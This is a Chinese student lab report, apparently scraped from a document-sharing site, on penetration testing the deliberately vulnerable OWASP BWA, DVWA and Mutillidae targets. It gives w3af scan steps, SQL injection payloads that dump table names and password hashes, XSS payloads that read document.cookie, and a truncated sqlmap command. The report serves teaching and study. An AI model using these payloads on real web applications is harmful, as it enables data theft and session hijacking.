Web应用程序渗透测试讲解.doc

  1. 1、本文档共18页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
PAGE  PAGE 18 Web应用程序渗透测试 姓名:滕召维 学号一、实验目的 1. 学习使用OWASP BWA靶机。 2. 学习使用Kali Linux进行Web应用程序渗透测试。 二、实验内容 1. 使用w3af漏洞扫描器对OWASP BWA靶机进行漏洞扫描。 2. 根据老师的课堂讲授,按照课件相关内容在OWASP BWA靶机上实践XSS和SQL注入两种攻击。 3. 配合使用Tamper Data和sqlmap进行sql注入攻击。 4. 利用文件上传漏洞植入Webshell。 三、主要实验结果 (一)使用w3af漏洞扫描器对OWASP BWA靶机进行漏洞扫描 1. 启动w3af漏洞扫描器。 2. 编辑新建的Profile,也就是配置各种插件。 对audit类插件勾选sqli和xss两个插件,如下图: 对crawl类插件只勾选web_spider,如下图 对web_spider的配置在窗口右侧,勾选only_forward并保存,如下图 对output类插件,只勾选输出html文件。对输出文件的配置在窗口右侧,如下图输入文件名称并保存。这样扫描结果将保存在/root/dvwa.html文件中。 4. 如下图在Target一栏输入扫描的网址,单击右侧按钮start启动扫描。 扫描过程中 扫描结果 在OWASP BWA靶机上实践XSS和SQL注入两种攻击 1. 在Kali Linux攻击主机上,按照课件第29页,实践“通过SQL注入攻击绕过身份认证机制”。 2. XSS和SQL注入攻击 (1)在攻击机上访问/dvwa,按照 1. 的攻击方法,登录进入DVWA训练系统。 (2)首先按照图示将DVWA应用的安全等级设置为Low。 按照课件29-31页,实践SQL注入攻击。 使用OWASP BWA靶机的DVWA应用程序演示如何获取后台数据库更多的信息。 输入文件“XSSSQLi.txt”中的脚本。 ?将数据表中的每一行都显示出来,输入: or 1=1 ?查询INFORMATION_SCHEMA系统表,输入: UNION SELECT 1, table_name from INFORMATION_SCHEMA.tables -- ?列出user表的内容,输入: UNION SELECT 1, column_name from INFORMATION_SCHEMA.columns where table_name = users -- ④取得口令的MD5值,输入: UNION SELECT NULL, password from users -- ⑤使用concat()函数将所有的信息都列出来,输入: UNION SELECT password, concat(first_name, , last_name, ,user) from users -- (4)按照课件第40页,实践反射式XSS攻击。 ?输入script alert(Have funs)/script ?输入scriptalert(document.cookie)/script 按照课件第43页,访问/mutillidae,登录进入mutilidae训练系统,实践存储式XSS攻击。 访问Mutillidae的Cross Site Scripting (XSS) 输入:SCRIPT/XSS SRC=/xss.js/SCRIPT xss.js的内容如下: document.write (This is remote text via xss.js located at + document.cookie); alert (This is remote text via xss.js located at + document.cookie); 首先按照sql注入攻击登录进入mutilidae训练系统 输入:SCRIPT/XSS SRC=/xss.js/SCRIPT document.write (This is remote text via xss.js located at + document.cookie); alert (This is remote text via xss.js located at + document.cookie); (三)配合使用Tamper Data和sqlmap进行sql注入攻击 重复(二)中步骤2-(1)和2-(2)。 启动Tamper Data插件。 按照课件33页使用Sqlmap进行SQL注入攻击。 (1)扫描,输入:sqlmap -u 29/dvwa/vulnerabilities/sqli/?id=aaSubmit=Submit# --cookie=Ta

文档评论(0)

shuwkb + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档